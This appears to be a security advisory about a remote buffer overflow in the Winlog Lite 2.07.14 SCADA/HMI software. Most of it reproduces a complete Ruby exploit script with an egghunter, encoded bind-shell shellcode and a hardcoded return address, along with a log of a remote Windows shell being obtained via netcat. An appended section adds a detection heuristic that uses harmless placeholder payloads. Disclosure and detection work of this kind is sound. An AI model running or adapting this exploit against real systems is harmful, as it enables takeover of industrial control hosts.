Release date: 2012-06-05
Update date: 2012-06-11

Affected systems:
sielcosistemi SIELCO SISTEMI Winlog Lite 2.07.14

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53811

Winlog Lite is the entry-level edition of Sielco Sistemi's SCADA/HMI software Winlog Pro; it lets users evaluate the package's capabilities and ease of use, and it is also a solution for building small supervisory applications.

Winlog Lite has a remote buffer overflow vulnerability in its implementation; an attacker can exploit it to execute arbitrary code.

<*Source: m1k3 (m1k3@s3cur1ty_de)
Link: http://www.securityfocus.com/archive/1/522974
http://www.linuxidc.com/Linux/2012-06/62642.htm
*>

Test method:
--------------------------------------------------------------------------------

Warning: the following program (method) may be offensive in nature and is provided only for security research and teaching purposes. Users bear the risk themselves!

m1k3 () provided the following test method:

# - Exploit:
#root@bt:~/msf-scripts# ruby runtime-exploit-01.rb
#placing the shellcode
#sleeping ...
#kicking ...
#buffer length: 261
#root@bt:~/msf-scripts# netcat -v 10.8.28.37 4444
#10.8.28.37: inverse host lookup failed: Unknown server error : Connection timed out
#(UNKNOWN) [10.8.28.37] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\All Users\Application Data\Winlog Lite\Projects\Ceramics Kiln\Template>
#
# Important:
# -> the reliability of your exploit depends on that path ...
# if you choose another default project or you start another project this path is not reliable anymore
# you can choose the default project on the installation. I have used Ceramics Kiln

require "socket"

port = "46824"
host = "10.8.28.37"

s = TCPSocket.open(host,port)
sleep(0.5)

# NtDisplayString egghunter, searches memory for the 8-byte tag "wootwoot"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter << "\xef\xb8\x77\x6f\x6f\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

#msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode =
"\xdb\xc8\xd9\x74\x24\xf4\x5b\xba\x45\x76\x08\xf1\x33\xc9" +
"\xb1\x56\x31\x53\x18\x83\xeb\xfc\x03\x53\x51\x94\xfd\x0d" +
"\xb1\xd1\xfe\xed\x41\x82\x77\x08\x70\x90\xec\x58\x20\x24" +
"\x66\x0c\xc8\xcf\x2a\xa5\x5b\xbd\xe2\xca\xec\x08\xd5\xe5" +
"\xed\xbc\xd9\xaa\x2d\xde\xa5\xb0\x61\x00\x97\x7a\x74\x41" +
"\xd0\x67\x76\x13\x89\xec\x24\x84\xbe\xb1\xf4\xa5\x10\xbe" +
"\x44\xde\x15\x01\x30\x54\x17\x52\xe8\xe3\x5f\x4a\x83\xac" +
"\x7f\x6b\x40\xaf\xbc\x22\xed\x04\x36\xb5\x27\x55\xb7\x87" +
"\x07\x3a\x86\x27\x8a\x42\xce\x80\x74\x31\x24\xf3\x09\x42" +
"\xff\x89\xd5\xc7\xe2\x2a\x9e\x70\xc7\xcb\x73\xe6\x8c\xc0" +
"\x38\x6c\xca\xc4\xbf\xa1\x60\xf0\x34\x44\xa7\x70\x0e\x63" +
"\x63\xd8\xd5\x0a\x32\x84\xb8\x33\x24\x60\x65\x96\x2e\x83" +
"\x72\xa0\x6c\xcc\xb7\x9f\x8e\x0c\xdf\xa8\xfd\x3e\x40\x03" +
"\x6a\x73\x09\x8d\x6d\x74\x20\x69\xe1\x8b\xca\x8a\x2b\x48" +
"\x9e\xda\x43\x79\x9e\xb0\x93\x86\x4b\x16\xc4\x28\x23\xd7" +
"\xb4\x88\x93\xbf\xde\x06\xcc\xa0\xe0\xcc\x7b\xe7\x2e\x34" +
"\x28\x80\x52\xca\xdf\x0c\xda\x2c\xb5\xbc\x8a\xe7\x21\x7f" +
"\xe9\x3f\xd6\x80\xdb\x13\x4f\x17\x53\x7a\x57\x18\x64\xa8" +
"\xf4\xb5\xcc\x3b\x8e\xd5\xc8\x5a\x91\xf3\x78\x14\xaa\x94" +
"\xf3\x48\x79\x04\x03\x41\xe9\xa5\x96\x0e\xe9\xa0\x8a\x98" +
"\xbe\xe5\x7d\xd1\x2a\x18\x27\x4b\x48\xe1\xb1\xb4\xc8\x3e" +
"\x02\x3a\xd1\xb3\x3e\x18\xc1\x0d\xbe\x24\xb5\xc1\xe9\xf2" +
"\x63\xa4\x43\xb5\xdd\x7e\x3f\x1f\x89\x07\x73\xa0\xcf\x07" +
"\x5e\x56\x2f\xb9\x37\x2f\x50\x76\xd0\xa7\x29\x6a\x40\x47" +
"\xe0\x2e\x70\x02\xa8\x07\x19\xcb\x39\x1a\x44\xec\x94\x59" +
"\x71\x6f\x1c\x22\x86\x6f\x55\x27\xc2\x37\x86\x55\x5b\xd2" +
"\xa8\xca\x5c\xf7"

# stage 1: send the tagged shellcode so it lands somewhere in process memory
puts "placing the shellcode"
buffer = "\x41" * 2000
buffer << "wootwoot" #egg
buffer << "\x90"
buffer << shellcode
buffer << "\x90" * 2000
print "buffer length: #{buffer.length}\n"
s.puts(buffer)

puts "sleeping ..."
sleep(5)

# stage 2: overflow the buffer and run the egghunter from the stack
puts "kicking ..."
buffer = "\x41" * 20 + "\x14" * 10 + "\x41" * 167
buffer << "\xdf\x53\x51\x40" #EIP -> Jmp ESP - Vclx40.bpl - 0x405153df
buffer << "\x90"
buffer << egghunter
buffer << "\x90" * (59 - egghunter.length)
print "buffer length: #{buffer.length}\n"
s.puts(buffer)

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
sielcosistemi
-------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:
http://www.sielcosistemi.com/en/download/public/winlog_lite.html
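As an added example that is not part of this advisory or of m1k3's script: while no vendor fix is available, a network-level heuristic can surface attempts to deliver the two-stage payload described above. The Ruby function below inspects a TCP payload destined for Winlog Lite's listener (port 46824, the port the test script connects to) and reports the traits the two messages exhibit: an oversized first message carrying the "wootwoot" egg tag beside long NOP (0x90) sleds, and a short second message dominated by one repeated filler byte. The thresholds, the sample payloads and the placeholder bytes that stand in for the shellcode are constructed for this example, not taken from captured traffic.

```ruby
# Added example (not from the advisory or m1k3's script): a defender-side
# heuristic for payloads sent to Winlog Lite's listener on port 46824.
# Thresholds are chosen for this example and should be tuned per site.

WINLOG_PORT = 46824
EGG_TAG     = "wootwoot"   # egg tag used by the advisory's two-stage payload
NOP         = "\x90".b     # x86 NOP, used for the sleds around the shellcode

# Length of the longest run of one repeated byte in +data+.
def longest_byte_run(data)
  best = 0
  run  = 0
  prev = nil
  data.each_byte do |b|
    run  = (b == prev) ? run + 1 : 1
    best = run if run > best
    prev = b
  end
  best
end

# Inspect one TCP payload. Returns an array of human-readable findings;
# an empty array means nothing suspicious was seen for this port.
def inspect_winlog_payload(dst_port, data)
  return [] unless dst_port == WINLOG_PORT
  data = data.b                      # compare raw bytes, not characters
  findings = []
  findings << "egg tag #{EGG_TAG.inspect} present" if data.include?(EGG_TAG)
  findings << "NOP sled (>= 64 bytes of 0x90)"    if data.include?(NOP * 64)
  run = longest_byte_run(data)
  findings << "single byte repeated #{run} times" if run >= 128
  findings << "oversized message (#{data.bytesize} bytes)" if data.bytesize > 1024
  findings
end

# Constructed samples (not real traffic). STAGE1 and STAGE2 mirror the shape
# of the advisory's two messages; 0xcc placeholders replace the shellcode and
# zero bytes replace the return address, so neither sample does anything.
STAGE1 = ("\x41" * 2000) + EGG_TAG + "\x90" + ("\xcc" * 368) + ("\x90" * 2000)
STAGE2 = ("\x41" * 20) + ("\x14" * 10) + ("\x41" * 167) + "\x00\x00\x00\x00" + "\x90" * 60
BENIGN = "GET /status HTTP/1.0\r\n\r\n"

if __FILE__ == $0
  [["stage1", STAGE1], ["stage2", STAGE2], ["benign", BENIGN]].each do |name, payload|
    f = inspect_winlog_payload(WINLOG_PORT, payload)
    puts "#{name}: #{f.empty? ? 'clean' : f.join('; ')}"
  end
end
```

Run the file directly to see the verdict for each sample. In practice the function would be fed payloads reassembled by an IDS or a capture tool, and the repeated-byte and size thresholds should be checked against legitimate Winlog project traffic so that ordinary data does not trip them.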